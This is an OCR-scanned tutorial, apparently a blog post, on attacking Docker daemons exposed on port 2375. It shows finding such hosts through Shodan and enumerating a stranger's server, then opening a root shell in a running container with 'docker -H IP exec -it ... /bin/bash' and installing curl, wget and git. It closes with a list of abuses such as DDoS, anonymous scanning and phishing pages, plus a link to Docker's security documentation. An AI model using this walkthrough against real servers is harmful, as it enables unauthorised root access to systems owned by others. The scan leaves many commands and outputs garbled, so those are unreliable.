DOCKER HACKING 


Since 2013, Docker has been a game changer in different IT industries in several ways, it gave both 
developers and users a lot of flexibility for developping and using many apps and operating systems. 


Firstly, Docker containers provide isolation and portability for software applications. By encapsulating 
an application and its dependencies within a container, developers can ensure consistent behavior 
across different environments. This eliminates the notorious “works on my machine” problem and 
streamlines the deployment process. 


Secondly, Docker enables the deployment of containers in clusters, managed by frameworks like 
Google’s Kubernetes. This approach allows for the separation of application code and infrastructure, 
facilitating highly resilient and elastic architectures. Container clustering is particularly beneficial for 
microservices-based applications, as it promotes scalability and fault tolerance. 


Lastly, Docker containers offer a higher layer of abstraction for application deployment. They simplify 
the process of configuring, saving, and sharing server environments. With Docker, installing an 
application or large software can be as easy as running a few commands. This ease of use enhances 
productivity and accelerates development cycles. 


While Docker has gained significant popularity in recent years, it does introduce some complexity to 
the development process, but also some weakness if you enable the remote access and use it with 
default settings. An attacker can then be root in a second, as we’|l see below. 


Remote access for Docker daemon 


If you want to work remotely on a container, it’s possible to configure Docker to accept requests from 
a remote host as explained on this page from the Docker documention. Even if the documentation 
explains how to protect Docker by creating a non-root user or protecting the daemon socket for 
example, a lot of remotely accessible containers are used with the default configuration, accessible 

on port 2375, but also on port 2376 for TLS using a root account. 


Find these containers on Shodan 


By searching for product: docker port:2375 on Shodan, we can see that many servers hosting 
containers with the port 2375 open. 
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Because Shodan’s free accounts provide limited results (2 pages), you can increase the number of 
available results by filtering and specifying alternatively different countries by 

adding count ry=XX where XX represents the country code: “country=US” for 

USA, “country=UK” for United Kingdom, “country=CN” for China, etc... Complete list 
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Analyse the server before attacking (Optional) 


When you use Docker remotely, you can use the usual options listed on this page. The difference is you 
need to spocify the host with the “-H” parameter. We will check first the Docker version installed by 
using the “- - version” option on the first server listed on Shodan in the previous section. Then, we 
can list all images installed and available with the images parameter. 


Wd 
Docker version 20.10.25+dfsgl1, build b82b9f3 


.97 images 
REPOSITORY TAG IMAGE ID CREATED 


ubuntu Latest #35 4 weeks ago 
nginx stable-alpine-perl if2a 5 weeks ago 
alpine Latest ildc 5 weeks ago 
ubuntu 18.64 492 3 months ago 


Launch the attack 


For listing every process actually running, you will use the “ps” parameter. You can see the operating 
system running on the container, its uptime, size, and espacially its image ID which we will use. 


docker .97 ps 
CONTAINER ID IMAGE COMMAND CREATED 


NAMES 
2ad = ubuntu:18.04 "/bin/bash" 2 hours ago 
adroit_oxter 
55a7 ubuntu:18.04 "/bin/bash" 12 hours ago 
adroit_obelus 
462 ubuntu:18.04 "/bin/bash" 12 hours ago 
boorish_peristeronic 
$38e ubuntu:18.04 "/bin/bash" 42 hours ago 
risible_hirquiticke 
m4b9 ubuntu:18.04 "/bin/bash" 2 days ago 
verdant_peristeronic 
"86F ubuntu "/bin/bash -c ‘apt-g.." 2 days ago 
distracted_einstein 
1a58 nginx: stable-alpine-perl "/docker-entrypoint..." 4 days ago 
hig ak :::8000->8000/tcp tools-web-nginx3-1 
2c5 nginx: stable-alpine-perl "/docker-entrypoint..." 4 days ago 
0- saa /EED, 6.90.0.0:443->4u3/tcp, :::443->443/tcp tools-ssl2-nginx-1 


Let’s try the first one, running Ubuntu. After docker -H IP_ADDRESS, we can select a container 
with the “exec” parameter, then add the “- it” options for an interactive shell (“1” 

for interactive and “t” for tty), and the image ID. Finally, we can write what do we want to use on this 
container, here “/bin/bash”. 
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docker —-H mm .97 exec —i' i2ad /bin/bash 
root@. t2ad:/# whoami 
root 
root@ 2ad:/# uname -a 
Linux i2ad 5.4.6-78-generic #78-Ubuntu SMP Fri Nar 19 13:29:52 UTC 2021 x8 


root@ i2ad: /# 


After a few seconds, we are root. No credentials, no confirmation, nothing. Just : 


“Hello that’s me! 
-OK, please come and do whatever you want”. 


Now, maybe you’ll need more tools. To install them, you’ll probably need wget, curl or git. On this 


container, curl is not available, you can install it with: aot install curl -y 


root@ j2ad:/# curl 
bash: curl: command not found 
root@ i2ad:/# apt install curl -y 
Reading package Lists... Done 
Building dependency tree 
Reading state information... Done 
The following NEW packages will be installed: 
curl 
®@ upgraded, 1 newly installed, 9 to remove and ® not upgraded. 
Need to get 159 kB of archives. 
After this operation, 398 kB of additional disk space will be used. 
Get:1 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 curl amd64 7.58. 


2% [1 curl 4652 B/159 kB 3%] 


Same for wget: apt install wget -y 


root@ i2ad: /# wget 
bash: wget: command not found 
root@2a8762d702ad:/# apt install wget —y 
Reading package Lists... Done 
Building dependency tree 
Reading state information... Done 
The following NEW packages will be installed: 
wget 
® upgraded, 1 newly installed, ® to remove and 0 not upgraded. 
Need to get 316 kB of archives. 
After this operation, 954 kB of additional disk space will be used. 
Get:1 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 wget amd64 1.19.1 
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The git command is already available, on this container. If not available you can install it with: apt 
install git -y 


root@ 2ad:/# git —-h 
unknown option: —h 

usage: git [--version] [--help] [-C <path>] [-c <name>=<valLue>] 
[--exec-path[=<path>]] [--html-path] [--man-path] [-—-info-path] 
[-p | --paginate | --no-pager] [--no-replace-objects] [--bare] 
[--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>] 
<command> [<args>] 

)2ad: /# | 


You can now imagine what a malicious attacker can do with all of these, like launching a DDoS 
attack executed from this container, scanning anonymously any sensitive server and coming back later 
to download results, creating a phishing attack or clickjacking webpage, etc... 


If your Docker containers are remotely accessible, please check the security section in the official 
documentation and make it secure: https://docs.docker.com/engine/security/ 
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